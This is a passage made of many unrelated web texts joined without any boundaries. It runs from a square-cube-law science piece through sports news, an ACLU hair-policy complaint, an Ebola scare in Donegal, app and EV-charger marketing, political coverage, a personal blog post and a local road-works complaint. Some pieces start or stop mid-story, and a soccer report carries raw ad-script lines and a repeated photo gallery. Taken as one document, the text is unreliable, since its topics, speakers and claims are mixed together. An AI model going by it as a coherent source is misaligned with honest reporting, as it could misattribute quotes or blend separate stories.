But that's nothing compared to your intestines. Inside your gut is about 300 m2
(about three and a half tennis courts) of small and large intestine — not bad for something that looks like about 8 metres of sausage casing.
Like your lungs the intestines are a single cell layer thick, so that nutrients and water can diffuse across them. But instead of sacs, the intestine is one crazy microscopic fingerland. It's all peaks and valleys with no plains in site. These finger-shaped projections are called microvilli, and they're a tiny version of the classic surface area maximizing shape. The same strategy gives jellyfish tentacles, single-celled organisms and pom poms maximum area bang for their volume buck.
There's one more major area where surface area/volume has an impact — in load bearing. Whether it's in the thickness of a leg bone or the choice of material in a multi-storey construction, scaling a model up or down isn't as straightforward as the fifty-foot woman makes it seem.
^ to top
Scaling: Galileo one, Gulliver nil
If Gulliver had really visited a land of giants, they wouldn't have looked like scaled up versions of him. If they did it would have been broken legs all round.
Unless you're made of gas any significant change in your volume is going to really stack on the kilos. The square cube law means that if you doubled a person's height they'd have four times the area but would weigh about eight times as much. To support all that newfound self, their leg bones would need to be four times wider than the original model, not just double the width. You'd forgive Gulliver the odd culturally inappropriate "I've seen better legs on pianos" when he hit the land of the giants.
At the other end of the scale, Rick Moranis's newly shrunken kids should have been able to leap tall furniture and lift things way heavier than themselves. (Surface tension would have played havoc with their circulatory, respiratory and digestive systems, but for those few seconds they did remain alive they would have been superheroes).
Shrinking the kids to one tenth of their height would cut their weight by a factor of a thousand (103), but the cross-sectional area of their muscle (and bone) would only be one hundred times smaller (102). That means they would have been ten times stronger for their size post-shrinkage. But still no match for a passing ant that could not only breathe, but lift something fifty times its weight.
The square-cube law makes scaling a staple of engineering. It's the reason tall buildings rely on steel, not just more concrete (steel is about 25 times stronger). And why those huge airbuses have got much bigger wings than jumbos — the A380 might only be a few metres longer and wider than a 747, but it weighs twice as much.
What it lacks in sexiness, surface are to volume ratio more than makes up for in global reach and power. Give it a phone hacking scandal and a paywall and it's Rupert Murdoch.
Thanks to Dr Terry Walsh, Head, School of Biomedical Sciences at Queensland University of Technology
^ to top
Dalglish's Liverpool are ahead of several European clubs in the hunt for Teixeira
Liverpool are close to agreeing a deal for Sporting Lisbon midfielder Joao Carlos Teixeira.
Talks are continuing between the two parties, with the latest bid understood to be £850,000 for a player who is yet to start a game for his current club.
The 19-year-old is out of contract in the summer and Sporting Lisbon are suffering financial problems.
When asked about a potential deal, Liverpool manager Kenny Dalglish said: "There might be something about that."
Teixeira, who has been compared to former Chelsea midfielder Deco, impressed while playing for Portuguese side Sporting Lisbon against Liverpool in a NextGen series game - a tournament for a selection of youth teams from across Europe - in August 2010.
He has been interesting the Anfield club since scoring an impressive goal against them.
SPORTING SUCCESS Sporting finished top of their group in NextGen, defeating Liverpool both home (5-1) and away (3-0)
Liverpool are understood to be ahead of several top European clubs in the queue for Teixeira's signature. But Dalglish stressed the youngster would not initially be a contender for a first-team squad place, saying: "He's only a kid."
Daliglish also played down links with Ghana Under-20 midfielder Mumuni Abubakar.
After a recent trial with the club, Abubakar told Joy Sports in Ghana: "They were impressed by my performances during training and the match that I played. Liverpool is talking with my agent [Oliver Arthur] now."
But Dalglish denied any knowledge of a deal.
"It must be the academy," he said. "We are expecting a quiet [transfer] window. Obviously the academy aren't but we are."
The American Civil Liberties Union of Massachusetts has filed a complaint against Malden's Mystic Valley Regional Charter School after reports that the school disciplined and suspended students because they wear braids, citing the school's dress policy.
The ACLU filed the complaint Monday with the state Department of Elementary and Secondary Education, charging that the policy is discriminatory, CBS News reports.
Reports came out last week that black students at the school—including twin 15-year-old sisters Deanna and Mya Cook —were punished for wearing braids with hair extensions. The girls were also banned from participating in track and the Latin Club and were not allowed to attend any school events, including prom, with the school citing violation of the its dress code.
However, some parents, including Deanna and Mya's, immediately struck back, slamming the crackdown as racist, especially given reports that some white students were not disciplined for coloring their hair, a practice also banned under the dress code, which prohibits hair extensions, although it does not specify hair extensions on braids.
Advertisement
Students were taken to administrators' office and asked whether their braids had any “fake hair,” according to parents who said that their children had been treated similarly. The twins' adoptive mother, Colleen Cook, said that “they marched black and biracial children down the hall” to inspect their hair.
“I was really excited to be celebrating my culture because I have white parents and it's very important to participate in the culture,” Mya told told CBS Boston.
“What they're saying is we can't wear extensions, and the people who wear extensions are black people,” Deanna explained. “They wear them as braids to protect their hair and they're not allowing us to do that.”
Advertisement
The twins' mother continues to be upset at the injustices she feels her daughters are facing in school.
“I'm angry, I feel like my children are beautiful, they're black, they should be proud of themselves, I'm very proud of them,” said Cook, who, along with her husband, Aaron, adopted the twins and their three other siblings.
“The policy specifically discriminates against African-American children as it relates to hair extensions,” Aaron Cook added. “You typically do not see Caucasian children with hair extensions. The fact that it's in the handbook does not make it a nondiscriminatory policy.”
Advertisement
The school contends that the ban on hair extensions was meant to “foster a culture that emphasizes education, rather than style, fashion or materialism.”
“The specific prohibition of hair extensions, which are expensive and could serve as a differentiating factor between students from dissimilar socioeconomic backgrounds, is consistent with our desire to create an educational environment, one that celebrates all that students have in common and minimizes material differences and distractions,” school interim Director Alexander Dan said in a statement.
Lawyers' Committee for Civil Rights and Economic Justice Education Project Director Matthew Cregor also penned a letter to the school's interim director, noting that the policy may be in violation of federal anti-discrimination law.
Advertisement
Cregor went on to suggest that the school's hiring policies may also be discriminatory, since only one of the school's 156 teachers is black.
Read more at CBS News and CBS Boston.
Tests are being carried out for the Ebola virus and isolation procedures have been put in place after the death of a man in his early 40s in Co Donegal.
It is understood that Dessie Quinn, from Doorin, outside Mountcharles, had been working in Sierra Leone and that a number of colleagues had contracted the virus there.
It is understood he had been living with his partner in Dublin but was visiting his family in Co Donegal when he was taken ill.
Fr Adrian Gavigan, of Mountcharles, said he had visited Mr Quinn, noting the dead man's family presumed he had died as a result of malaria.
Mr Quinn was found dead on Wednesday night and taken to Letterkenny General Hospital, it is understood.
While the cause of death is unknown the HSE is carrying out tests to see whether it was due to exposure to Ebola.
The HSE said it was currently assessing a suspected case of Ebola virus disease (EVD) in Donegal.
“The public health department was made aware earlier today of the remains of an individual, discovered early this morning, who had recently travelled to the one of the areas in Africa affected by the current Ebola virus disease outbreak,” it said.
“The appropriate national guidelines, in line with international best practice, are being followed by the public health team dealing with the situation. This means that the body of the deceased has been isolated to minimise the potential spread of any possible virus.”
The statement said blood samples had been sent for laboratory testing to confirm whether or not this individual had contracted Ebola virus disease.
“Until a diagnosis is confirmed, and as a precautionary measure, the individual's remains will stay in the mortuary pending the laboratory results”. The results are due today.
The HSE said the risk of transmission of any disease was considered to be “extremely low”.
But as a precautionary measure, appropriate infection control procedures are being put in place in the community and at the mortuary pending the outcome of laboratory tests.
Dr Darina O'Flanagan, head of the HSE Health Protection Surveillance Centre, said: “In general, the risk of contracting Ebola virus disease is extremely low and would involve very close personal contact with the infected individual or their body fluids for there to be any risk at all.”
“We await the outcome of the laboratory tests before we will know whether or not this individual had contracted Ebola virus disease. The appropriate public health guidelines are being followed at every stage in this process as a precaution.”
The World Health Organization said yesterday that 2,473 people have been infected and 1,350 have died since the Ebola outbreak was identified in remote southeastern Guinea in March. Guinea, Sierra Leone, Liberia and Nigeria are the countries affected by the outbreak.
Ebola was recorded in Spain last week when a Spanish priest evacuated from Liberia died of the illness.
The disease has no proven cure and there is no vaccine. The rigorous use of quarantine is needed to prevent its spread, as well as high standards of hygiene for anyone who might come into contact with it.
The South African government said yesterday that due to fears over the spread of the Ebola virus it was banning travellers from Guinea, Liberia and Sierra Leone from entering the country, apart from its own citizens.
Travellers from Nigeria, where there is a much smaller outbreak, will be allowed entry.
South African citizens returning from the three highest risk countries will be permitted entry but will be subject to a stricter screening process, a government statement said.
Join the 5 million+ people around the world who are accomplishing their goals with Todoist – the beautiful, simple to-do list built for the pace of modern life. Get your tasks out of your head and onto your to-do list so you can focus on what's important right now. Whether you need to collaborate with your team, keep track of an important project, or just remember to pay the rent, Todoist is there to help you achieve more, every day. Praised as a life-changing app by The Guardian, USA Today, the New York Times, The Wall Street Journal, Forbes, Lifehacker and more. With Todoist you can: - Easily add, view, and manage your tasks from your phone, tablet, desktop, browser, email, and more - even offline! - Stay on top of your important deadlines with due dates and recurring dates like “every 1st of the month” - Collaborate seamlessly in shared projects - easily delegate tasks and share updates with coworkers, family, and friends - Add comments, upload files, and receive instant notifications on progress in shared projects so you always know what's happening when - Get organized with sub-tasks, priority levels, sub-projects, and color-coded projects Take on your biggest goals with Todoist Premium: - Get automatic reminders of your tasks via push notification, email or SMS text message based on your physical location or the date and time. - Get even more organized using task notes, enhanced labels, and powerful filters. - Upload files, sound recordings and photos to your personal tasks from your computer. - And much, much more! Todoist for Windows 10 is currently an app Preview. We'd love to get your feedback to make it even better! And feel free to contact us directly if you need any kind of support: https://support.todoist.com
Motorola held a decided low-key press conference today at Mobile World Congress. It was a snoozer. But! But Rick Osterloh, Motorola SVP, confirmed that the brand is still working on smartwatch development and there is another one on the way.
Motorola was in fact one of the first firms to attempt a smartwatch. Way back in the balmy days of 2011, Motorola released the Motoactiv GPS and fitness watch. It was rather bulky, think iPad nano on a wrist band, but Motorola packed it full of features geared towards the fitness crowd. The damn thing could even play Angry Birds. The product was discontinued in 2013.
It's unclear from today's event when Motorola's next smartwatch will hit stores although the executive stated that the company is targeting a 2014 launch. It's conceivable that the watch is shelved until Motorola Mobility is completely under Lenovo's control. A lot is riding on this device as the war over wearables heats up.
When it launches, Motorola's watch will face stiff competition from the Pebble Steel, new Samsung Gear watches, and even more traditional fitness trackers such as the Fitbit.
Ontario's biggest – and most expensive – new hole in the ground has finally become a tunnel. Big Becky, the 4,000-tonne boring machine that has been chewing her way through 10.2 kilometres of rock at Niagara Falls finally broke through into daylight shortly after noon Friday, just above the Falls.
Workers celebrate as the "Big Becky" tunnel boring machine makes its breakthrough in Niagara Falls May 13, 2011 for the new hydroelectric project there. ( Ontario Power Generation ) The "Big Becky" tunnel boring machine making its breakthrough in Niagara Falls May 13, 2011 for the new hydroelectric project there. ( Ontario Power Generation photo ) Giant boring machine Big Becky is seen in this 2006 file photo. ( SUPPLIED PHOTO )
She was greeted by Premier Dalton McGuinty, on hand to trumpet his government's commitment to clean renewable power, even though the project is coming in two years late, and costing $1.6 billion instead of the $985 million budgeted. She was also greeted by scores of the men and women who have laboured in the tunnel, driving Becky forward and lining the tunnel with smooth concrete. Men like Niagara Falls native Chris Campbell, were excited to see the project come to fruition.
Article Continued Below
“There's light at the end of the tunnel,” said Campbell. “It's a big day.” “It's starting to kick in,” he said, staring at McGuinty and the other dignitaries, “how big this project actually was.” Really big, in fact. The 10.2 kilometre tunnel is 14.4 metres in diameter.
Big Becky ate through 1.6 million cubic metres of rock to reach her goal. That's enough rock, officials said, to fill the Rogers Centre in Toronto. And the cement used to line the tunnel would build a sidewalk stretching from Windsor to Quebec City.
Article Continued Below
Because of cramped conditions in the tunnel, the hundreds of invited dignitaries watched Becky emerge through the final rock barrier on a giant screen, its image dimmed by a brightly shining sun. One chunk of rock, then more and more fell away as the machine's working end finally came into view — a giant rotating hemisphere, studded with diamond-hard cutters projecting from the surface. Despite the excitement of the day, nagging questions about the cost over-run wouldn't go away. The project took longer and cost more because Becky ran into unexpected conditions. She's designed to go through solid rock, but encountered a stretch of loose, crumbling material that was unsuitable for tunneling. That forced a long and expensive detour. But if the critics are harping about the cost of the Liberal government's green energy projects — and Conservative leader Tim Hudak has taken dead aim at them — McGuinty was having none of it. “Yes, some of it has come at a price that hasn't been easy,” McGuinty said. “But neither was it easy for our parents and grandparents to build our original electricity system, to build our schools, to build our roads.” “But they did it anyway, because they were builders. And so are we.” McGuinty shrugged off the cost overrun, pointing out that the tunnel has an expected lifespan of 100 years, once it gets operating in 2013. “When you spread that cost over the 100-year duration of the project, it just doesn't get any better in terms of the kind of power we've got our hands on here,” he said. “When you compare the options available to us, nothing is easy, nothing is free,” he said. “It's well worth the investment.” Projects like the tunnel will put Ontario in the forefront of clean energy technology and create tens of thousands of jobs in the province, McGuinty boasted, a claim he is likely to hammer at in the coming election campaign. But many of the workers had tuned out the political bickering, basking in the glow of the accomplishment. One worker in hard hat and boots, who didn't want to be named, noted that crews had actually punched a one-meter gap through the final wall a couple of weeks ago, allowing crews to bask in the feel of air finally gushing through the new tunnel. “This is all a show, right?” he said. The workers, he said, were planning a party of their own, the real celebration, in a Niagara Falls hall on Friday night.
Read more about:
It was a game of missed opportunities for both the San Francisco Deltas and Indy Eleven on Saturday afternoon. The result was a deserved 0-0 draw which kept the Deltas undefeated to start the season.
The best chances in the game for both teams came late in the second half. In the 75th minute, San Francisco's Kyle Bekker took a shot from outside the box that was heading for the top left corner. Indy Eleven veteran keeper Jon Busch stretched to tap it over the bar for the save.
Just a few minutes later Indy had a golden opportunity when a cross found the head of a streaking Eamon Zayed. He struck it clean on goal from ten feet, but Deltas keeper Romuald Peiser made an outstanding reflex save to deny the striker. It has now been over 240 minutes since Peiser has let a goal into the back of the net.
HIGHLIGHTS | Indy Eleven 0, San Francisco Deltas 0 (Video: NASL)
“Our mentality and attitude during the 90 minutes was excellent. Our guys stayed focused against Indy in a place that is difficult to play,” said SF Deltas head coach Marc Dos Santos.
The Deltas fielded the same starting 11 from last week's game against Jacksonville, except for Danny Cruz playing out wide for the suspended Jackson. Cruz, unfortunately, picked up a leg injury in the first half after a collision and was replaced by Tyler Gibson.
San Francisco once again outshot the opposition with five shots on target versus Indy's two. Heinemann had two shot on goal, with his closest chance a header that sailed just over the crossbar in the 81st minute.
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-5', placement: 'Interstitial Gallery Thumbnails 5', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-10', placement: 'Interstitial Gallery Thumbnails 10', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-15', placement: 'Interstitial Gallery Thumbnails 15', target_type: 'mix' });
window._taboola = window._taboola || []; _taboola.push({ mode: 'thumbnails-c', container: 'taboola-interstitial-gallery-thumbnails-19', placement: 'Interstitial Gallery Thumbnails 19', target_type: 'mix' });
Photo: Matt Schlotzhauer Image 1 of / 20 Captions Close Image 2 of 20 Tyler Gibson controls the ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Tyler Gibson controls the ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 3 of 20 Indy Eleven's Éamon Zayed is dfended by the San Francisco Deltas Nana Attakora in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Indy Eleven's Éamon Zayed is dfended by the San Francisco Deltas Nana Attakora in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 4 of 20 The Deltas' Thomas Heinemann and Indy Eleven's Justin Braun battle for a header in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) The Deltas' Thomas Heinemann and Indy Eleven's Justin Braun battle for a header in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 5 of 20 Image 6 of 20 The Deltas Pablo Diego reaches for a ball while defended by Indy's Marco Franco in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) The Deltas Pablo Diego reaches for a ball while defended by Indy's Marco Franco in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 7 of 20 The Deltas Kenny Teijsse and Indy Eleven's Éamon Zayed keep their eye on a loose ball in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) The Deltas Kenny Teijsse and Indy Eleven's Éamon Zayed keep their eye on a loose ball in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 8 of 20 The Deltas' Pablo Dyego controls a ball while defended by Indy Eleven's Craig Henderson in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) The Deltas' Pablo Dyego controls a ball while defended by Indy Eleven's Craig Henderson in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 9 of 20 Indys Craig Henderson and San Francisco's Cristian Portilla fight for a loose ball in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Indy's Craig Henderson and San Francisco's Cristian Portilla fight for a loose ball in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 10 of 20 Image 11 of 20 The Deltas Cristian Portilla heads the ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) The Deltas Cristian Portilla heads the ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 12 of 20 Cristian Portilla heads a ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Cristian Portilla heads a ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 13 of 20 The Deltas Kenny Teijsse and Indy Eleven's Éamon Zayed keep their eye on a loose ball in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) The Deltas Kenny Teijsse and Indy Eleven's Éamon Zayed keep their eye on a loose ball in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 14 of 20 Deltas goalkeeper Romuald Peiser smothers a ball pursued by Indy Eleven striker Justin Braun in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Deltas goalkeeper Romuald Peiser smothers a ball pursued by Indy Eleven striker Justin Braun in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 15 of 20 Image 16 of 20 Indys Justin Braun is defended by the Deltas Reiner in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Indy's Justin Braun is defended by the Deltas Reiner in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 17 of 20 Indys Brad Ring passes the ball away from the Deltas Kyle Bekker in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Indy's Brad Ring passes the ball away from the Deltas Kyle Bekker in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 18 of 20 Indy Eleven's Justin Braun is defended by the Deltas in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Indy Eleven's Justin Braun is defended by the Deltas in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 19 of 20 Tommy Heinemann heads a ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Tommy Heinemann heads a ball against Indy Eleven in their match held at Michael A. Carroll Stadium in Indianapolis. (Photo: Matt Schlotzhauer) Photo: Matt Schlotzhauer Image 20 of 20 SF Deltas secure away draw against Indy Eleven 1 / 20 Back to Gallery
After other league results, San Francisco held onto the second position in the NASL standings with six points (1-3-0), two behind league-leading Jacksonville.
“Although we got another important point, we felt we could have won the game,” Dos Santos lamented. “Now it's time to refocus and prepare for our next match against the Cosmos.”
The Deltas return home to Kezar Stadium to face the defending NASL champions New York Cosmos next Saturday. Kickoff time is 7 pm.
Kirklees College Huddersfield: UK Decmeber 2015
Kirklees college is a large abandoned site in Huddersfield.
Originally Huddersfield Infirmary which was built in 1831, a number of expansions were made during its life as a hospital it eventually closed in 1965.
In 1967 the hospital was purchased by Ramside Technical College. Again more expansion projects were put in place and in the late 1970s the site catered for 7000 students.
The college here closed in 2013 when they were relocated to a new purpose built site at a cost of £70million.
Since its closure it has been used as a film set the bed set up was left from a film called Extrermis it was also used in a film called Scintilla which was set in Russia.
The older Victorian buildings are grade ii listed and are to be redeveloped for future use. It seems likely options are a veterinary practice and a doctors surgery. The older buildings will most likely be demolished to make way for a new supermarket and retirement flats.
that is what i was called today, by my crush, nonetheless. i was working on a project in school and there were three of us. the other two girls were called “skinny minnies”. i felt embarrassed and set apart from the group immediately. She came up to us and said “hey skinny minnies!” and smiled at the other two girls. then she turned to me and said “hello fatty.” she might have been trying to be funny, but it hurt and i am not attracted to her anymore.
i only weigh 230. and even if i weighed more, this shouldnt be a problem. i love who i am everyday, thanks to this blog, and its just upsetting to have people do this to me, when I see nothing wrong with myself anymore. I told the girl that she was rude and that I am already oppressed and that she does not have to allow fatphobia to cloud her mind. She laughed at me and stalked off.
A good thing did happen though. After that happened, one of the thin girls in my group said that what my ex-crush said wasn't nice and that she thought I was beautiful. She said she was jealous of how pretty I was.(she said that she was too thin.) I told her that i also thought she was pretty, and that we should love ourselves no matter what our bodies look like.
we have a date tomorrow. thanks, TiTP. You've really helped me feel better about myself. My name is Andrea, and I like who I am.
President Trump's Supreme Court nominee, Neil Gorsuch, told Sen. Dick Durbin Richard (Dick) Joseph DurbinKids confront Feinstein over Green New Deal Senate plots to avoid fall shutdown brawl Overnight Energy: Trump ends talks with California on car emissions | Dems face tough vote on Green New Deal | Climate PAC backing Inslee in possible 2020 run MORE (D-Ill.) that he accepts the landmark Supreme Court case establishing a right to abortion “as the law of the land.”
Gorsuch has never ruled directly on abortion rights, but liberal groups assume he would be hostile to continued access to abortion rights because of a book he authored on euthanasia.
In “The Future of Assisted Suicide and Euthanasia,” Gorsuch wrote, “The intentional taking of human life by private persons is always wrong.”
ADVERTISEMENT
On day three of Gorsuch's confirmation hearing before the Senate Judiciary Committee, Durbin demanded he explain how he could square that statement with the legal right to an abortion.
“As the book explains, the Supreme Court of the United States has held in Roe v. Wade that a fetus is not a person for purposes of the 14th Amendment and the book explains that,” Gorsuch answered.
“Do you accept that?” Durbin asked.
“I accept the law of the land, senator, yes,” Gorsuch replied.
On Tuesday, the landmark case on abortion rights came up several times.
Gorsuch told members of the committee that President Trump never asked him to overturn Roe v. Wade, in response to a question from Sen. Lindsey Graham Lindsey Olin GrahamHouse to push back at Trump on border Trump pressures GOP senators ahead of emergency declaration vote: 'Be strong and smart' This week: Congress, Trump set for showdown on emergency declaration MORE (R-S.C.).
Graham asked the federal appellate judge if he had ever met Trump personally. Gorsuch said he had not, until his interview for the nomination.
“In that interview did he ever ask you to overrule Roe v. Wade?” Graham asked.
When Gorsuch said no, Graham asked what he would have done if Trump had asked that question.
“Senator, I would have walked out the door,” Gorsuch replied. “It's not what judges do. I don't do it at that end of Pennsylvania Avenue and they shouldn't do it at this end either, respectfully.”
Donald Trump's campaign released another new television ad today, hitting Hillary Clinton for getting rich by using 'pay to play politics.'
'The ad that we're releasing today is called "Corruption,"' explained Trump's campaign manager Kellyanne Conway during an appearance on 'Good Morning America,' previewing the 30-second spot.
'And that really takes into account that the Clintons came out of the White House, she said they were "dead broke" and they went ahead and made a quarter of a billion in speaking fees,' Conway added.
With sinister visuals of Hillary and Bill Clinton throughout, the television ad asks 'how did Hillary end up filthy rich?'
Scroll down for video
A new Donald Trump television ad attacks the Clintons for getting rich on the backs of others via a 'pay to play' set-up with their family foundation
The 30-second spot uses the widely mocked line that Hillary Clinton was 'dead broke' when she left the White House in the year 2001
The answer, according to the Trump campaign, 'pay to play politics.'
The ad alleges that a 'staggering amount of cash poured into the Clinton Foundation' from 'criminals, dictators' and 'countries that hate America.'
It suggests that the Democratic nominee 'cut deals for donors,' that she 'sold out American workers' and 'exploited Haitians in need.'
In March, the New York Times outlined the litany of complaints that many Haitians have about the Clintons, from them not bringing as many jobs as promised to the poor island nation, to insider deals – like that of Hillary Clinton's brother Tony Rodham's business ventures in the country – to even the rigging of a presidential election while Clinton was still the secretary of state.
Haitians also bemoan that earmarked money to help rebuild the country has yet to be spent.
The ad also blasts Clinton for handing American Uranium rights over to the Russians.
The ad suggests that 'pay to play politics' were afoot, suggesting that the Clintons used the Clinton Foundation to trade access to cash, of which there is no concrete evidence
Donald Trump's team again used the Clinton Foundation and the money it raised as a sign of the Clintons' corruption
Trump is referring to the Russians gaining control of the company Uranium One, which purchased one-fifth of all uranium production capacity in the United States, meaning it had to be signed off by the State Department and others.
This happened while Hillary Clinton was secretary of state.
Nine people related to the company had also donated money to the Clinton Foundation and Bill Clinton was paid $500,000 for delivering a speech in Moscow from an investment bank with Kremlin-ties that was promoting the company's stock.
While shady, Trump has been called out for overstating these pay-to-play claims, with Politifact pointing out that 'while the connections between the Clinton Foundatoin and the Russian deal may appear fishy, there's simply no proof of quid pro quo.'
Getting in a final knock on the Clintons, the final line of the ad is: 'Hillary Clinton only cares about power, money and herself.'
The ad concludes by stating that Hillary Clinton is only in the presidential race to further enrich herself
According to Trump's senior communications adviser Jason Miller, the ad will be aired on television nationally, and rotated heavily through the battleground states.
'Hillary Clinton might be the single most corrupt candidate to ever seek the Presidency and should be disqualified for her inability to tell truths to the American people,' Miller claimed in a statement to reporters that came alongside the video's online release.
'Corruption' comes out on the heels of a more controversial pro-Trump spot, which uses footage of Clinton bobbing and weaving upon leaving the 9/11 memorial, when she was sick with pneumonia and almost passed out.
Conway defended the use of that footage in the ad, saying that overall the spot was questioning 'her record ... as secretary of state.'
When Stephanooulos pointed out at the spot, released yesterday, seems to be making fun of her health, Trump's campaign manager pushed back.
Car manufacturers sold almost twice as many electric vehicles in 2014 as they did between 2010 and 2013. We went from 320,000 electric cars on the roads in 2013 to more than 740,000 at the end of 2014. The EV market is currently exploding, and with it the need for electric charging stations.
Public charging stations are popping up everywhere, from Australia to New Jersey. But what about private stations? Most early adopters of electric vehicles were homeowners. They had the resources and ability to install private chargers in their garage. Now that the market extends to a larger public, we see more and more EV owners who live in condos or apartment complexes. How can they set up their own charging station?
Providers such as ChargePoint recommend Property Managers to install public chargers in private parking. While this solution can be quick and easy, it is in the long run an expensive and inefficient one. Here's why.
Public charging stations are not reliable: Let's take the example of a building with 50 apartments and the same number of parking spaces. The solution offered by public charging providers is to block a few parking spots to install stations on. Property managers then turn these spots into ”community parking for electric vehicles”.
This setup will work well when only a few residents own electric cars. They can share the stations without conflict. But what happens when 10, 20, 30 residents own an electric vehicle? They will have to compete to get a spot, making it stressful and inefficient for everyone.
You may think that the answer to this problem is to add ”community chargers”. But when adding chargers, property managers will face a second, more important problem: Public charging stations don't scale: While Level 1 charging stations are enough for hybrid vehicles, electric vehicles usually need Level 2 charging stations. Level 2 chargers use 240 volts and cut the charging time by about one-half compared with 120 volt charging. Level 2 EV chargers require 30-40 amps to operate.
Buildings have a finite amount of power when constructed. Since they weren't built with EV charging in mind its common for a property to only have 100-150 amps of power available for EV charging.
That's easy math: A building with 100 amps available will not be able to power more than 3 public chargers. Once available power is used to facilitate more chargers ,the building may have to invest in transformers or bringing in new service to the building Adding new service is prohibitively expensive and requires major building work.
The Solution: Intelligent Charging Stations
EV owners don't need to charge their car all the time. Some may need to charge it at night, while others only need to charge on the weekends. Yet a traditional charger will block the power it needs to be operational at all times. Whether a car is being charged or not.
The solution is to make charging stations more ”intelligent”. A smart EV charger network can distribute the power between several chargers and manage supply based on usage. Each resident can have their own dedicated charger and receive power when they need it. Property managers can install more chargers without having to upgrade their electric infrastructure immediately.
Where to find Smart EV Charging Stations?
EverCharge is the first provider of smart EV chargers. Our network of charging stations learns from residents' usage to intelligently distribute power. Using EverCharge, property managers can install up to 12 chargers on just 100 amps. That's 9 more than what could be done using public chargers. We limit costs while keeping all residents happy.
We now live in a world where sustainable development has become a necessity to slow down climate change. Switching from motor to electric vehicles is one of the most important steps towards this goal. Yet the results of this major change will be tarnished if we are not able to distribute power more efficiently. EverCharge can help make a difference at our humble scale, and we hope you'll join us.
The Kansas City Chiefs 10-3 win over the San Diego Chargers didn't do much for their spot in this week's NFL power rankings. The Chiefs are pretty much where they were this time around last week after they had beaten the Raiders. Voters are understandably not all that impressed with a 10-3 win over a four-win team.
The Chiefs sitting between 6-8 sounds right to me. They haven't done enough on the whole this season to prove they should be up there with the Patriots of the world. But they've shown they can be one of the hottest teams to enter the playoffs (if they make the playoffs).
Here's a roundup of this week's NFL power rankings:
SB Nation: 6
ESPN: 9
Alex Smith threw an interception on Sunday after going 312 consecutive attempts without one. According to Elias, Smith's streak is the second-longest in NFL history (Tom Brady, 358 attempts).
PFT: 8
Apparently, they were the best 1-5 team in NFL history.
USA Today: 8
Their 17 touchdowns on the ground lead the league, and only four came courtesy of injured superstar Jamaal Charles.
Yahoo Sports: 8
Not the most impressive performance at home, but the conditions weren't great either. Whatever, it was a win. No big deal unless the offense falters again next week, then maybe we'll revisit. (And please, don't hit me with "How could you move them down????" complaints. These next two teams deserved to be moved up. In that case, someone has to get displaced.)
The MMQB: 8
Just run, Andy Reid. Just run.
Washington Post: 5
The Chiefs simply don't lose any more, even if the Chargers did make things mighty interesting with their late drive to the 1-yard line Sunday. But Kansas City held on, and the winning streak should continue this Sunday in Baltimore.
NFL.com: 8
People living on Old Landover Road have been trapped in their homes for a week as sidewalk construction blocks their driveways. They tell 7 On Your Side they received no notice, and no temporary way to get to access to their own homes as promised by Prince George's County.
The notice below is what a Prince George's Co. warning letter for road work looks like.
“I still feel like I'm in prison in my house all weekend. It seems like its false imprisonment because I can't go anywhere unless I walk. I can't move my car, I can't do anything,” said Deane Loines.
“They're putting in sidewalks and curbs. I welcome both of them. But I don't welcome not being notified,” added Loines.
Loines and his family have had to pay for a combination of Metro and Uber to head to work.
